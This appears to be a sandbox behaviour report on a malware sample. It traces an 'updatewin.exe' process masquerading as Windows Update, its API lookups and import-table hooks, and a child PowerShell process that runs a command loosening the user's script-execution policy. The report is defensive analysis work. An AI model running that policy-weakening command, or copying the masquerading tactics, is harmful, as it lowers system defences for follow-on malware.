Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749cc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
System (256)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 1627-02-27 16:55:51 (UTC) True 2
Fn
Get Time type = Ticks, time = 110433 True 1
Fn
Get Time type = Performance Ctr, time = 16932627243 True 1
Fn
Get Time type = Ticks, time = 110542 True 1
Fn
Get Time type = System Time True 249
Fn
Get Time type = Performance Ctr, time = 16982197565 True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Process #9: updatewin.exe
719 0
»
Information Value
ID #9
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:49, Reason: Child Process
Unmonitor End Time: 00:01:08, Reason: Self Terminated
Monitor Duration 00:00:19
OS Process Information
»
Information Value
PID 0x7b4
Parent PID 0x714 (c:\users\5p5nrgjn0js halpmcxz\desktop\a959.tmp.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 5CC
0x 114
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
updatewin.exe 0x00400000 0x0044DFFF Relevant Image - 32-bit - False False
buffer 0x005B5000 0x005B5FFF Marked Executable - 32-bit - False False
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x00000000005a0000:+0x16785 90. entry of updatewin.exe 4 bytes kernel32.dll:QueryPerformanceCounter+0x0 now points to pagefile_0x00000000009c0000:+0x640000
IAT private_0x00000000005a0000:+0x16785 121. entry of updatewin.exe 4 bytes user32.dll:CallMsgFilterW+0x0 now points to pagefile_0x00000000009c0000:+0x640000
Host Behavior
File (6)
»
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Module (169)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load USER32.dll base_address = 0x74f40000 True 1
Fn
Load GDI32.dll base_address = 0x75ad0000 True 1
Fn
Load COMCTL32.dll base_address = 0x74810000 True 1
Fn
Load WINMM.dll base_address = 0x74ae0000 True 1
Fn
Load msvcr100.dll base_address = 0x749b0000 True 1
Fn
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x76c20000 True 2
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 2
Fn
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 11
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin.exe, size = 260 True 1
Fn
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 8
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x76c334d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetDesktopWindow, address_out = 0x74f60a19 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = InvalidateRect, address_out = 0x74f61381 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfW, address_out = 0x74f7e061 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DrawIcon, address_out = 0x74f68deb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = FillRect, address_out = 0x74f60eb6 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x74f59679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetDlgItem, address_out = 0x74f7f1ba True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x74f59abb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x74f61341 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x74f61361 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x771625dd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x74f59a55 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DialogBoxParamW, address_out = 0x74f7cfca True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MoveWindow, address_out = 0x74f63698 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetClientRect, address_out = 0x74f60c62 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateDialogParamW, address_out = 0x74f810dc True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x74f63559 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x74f60dfb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetWindowPos, address_out = 0x74f58e4e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x74f58a29 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x74f5b17d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x74f588f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x74f5787b True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x74f57809 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateAcceleratorW, address_out = 0x74f61246 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x74f578e2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadAcceleratorsW, address_out = 0x74f64dd6 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadStringW, address_out = 0x74f58eb9 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadIconW, address_out = 0x74f5b142 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMonitorInfoW, address_out = 0x74f63000 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MonitorFromWindow, address_out = 0x74f63150 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = TextOutW, address_out = 0x75aed41c True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetBkMode, address_out = 0x75ae51a2 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SelectObject, address_out = 0x75ae4f70 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateFontW, address_out = 0x75aeb600 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = DeleteObject, address_out = 0x75ae5689 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateSolidBrush, address_out = 0x75ae4f17 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetTextAlign, address_out = 0x75ae8401 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll function = InitCommonControlsEx, address_out = 0x748309ce True 1
Fn
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x74ae26e0 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749cc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create Windows Update class_name = WINDOWSUPDATE, wndproc_parameter = 0 True 1
Fn
System (271)
»
Operation Additional Information Success Count Logfile
Sleep duration = 1000 milliseconds (1.000 seconds) True 15
Fn
Get Time type = System Time, time = 1627-02-27 16:55:51 (UTC) True 1
Fn
Get Time type = Ticks, time = 110682 True 1
Fn
Get Time type = Performance Ctr, time = 16958837528 True 1
Fn
Get Time type = Ticks, time = 110776 True 1
Fn
Get Time type = System Time True 249
Fn
Get Time type = System Time, time = 1627-02-27 16:55:52 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 17012278956 True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Process #10: powershell.exe
494 0
»
Information Value
ID #10
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\
Monitor Start Time: 00:00:49, Reason: Child Process
Unmonitor End Time: 00:01:08, Reason: Self Terminated
Monitor Duration 00:00:18
OS Process Information
»
Information Value
PID 0x330
Parent PID 0x7fc (c:\users\5p5nrgjn0js halpmcxz\appdata\local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin1.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 7A0
0x 7A8
0x 804
0x 808
0x 824
0x 828
0x 9F8
0x 9FC
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B44390 False False
powershell.exe 0x21FB0000 0x22021FFF Relevant Image - 32-bit - False False
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B89A98 False False
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B43950 False False
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B74AA0, 0x73B43AE8 False False
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B75BC0 False False
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B761C4 False False
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B7F3AC False False
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B80220 False False
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B84378 False False
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B83C14 False False
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B703B8 False False
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B71000 False False
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B82E94 False False
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B81910 False False
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B73B80 False False
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B6D828 False False
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B6E000 False False
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B6FAF0 False False
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B77380 False False
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B42D60, 0x73B43A10 False False
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B76298 False False
microsoft.powershell.security.ni.dll 0x73940000 0x7396CFFF Content Changed - 32-bit 0x7394B2E0 False False
microsoft.powershell.security.ni.dll 0x73940000 0x7396CFFF Content Changed - 32-bit 0x7394AFF0 False False
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B439B8 False False
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B78164 False False
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B757D4 False False
microsoft.powershell.consolehost.ni.dll 0x73B30000 0x73BB0FFF Content Changed - 32-bit 0x73B70428 False False
microsoft.powershell.commands.utility.ni.dll 0x70F60000 0x710FDFFF Content Changed - 32-bit 0x70FA46B0, 0x70F9A330 False False
microsoft.powershell.commands.utility.ni.dll 0x70F60000 0x710FDFFF Content Changed - 32-bit 0x7105B574, 0x70FA51D0 False False
microsoft.powershell.commands.utility.ni.dll 0x70F60000 0x710FDFFF Content Changed - 32-bit 0x70F98030 False False
microsoft.powershell.security.ni.dll 0x73940000 0x7396CFFF Content Changed - 32-bit 0x73948FB8 False False
microsoft.powershell.security.ni.dll 0x73940000 0x7396CFFF Content Changed - 32-bit 0x739620E0 False False
Host Behavior
File (97)
»
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.config type = file_attributes False 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0 type = file_attributes True 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_type True 2
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz type = file_attributes True 5
Fn
Get Info C:\ type = file_attributes True 4
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598 type = file_attributes True 7
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData type = file_attributes True 4
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local type = file_attributes True 4
Fn
Get Info C:\Users type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WindowsPowerShell\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 2530 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 542, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 4096 True 17
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 3022 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 50, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 4096 True 4
Fn
Data
Registry (201)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 2
Fn
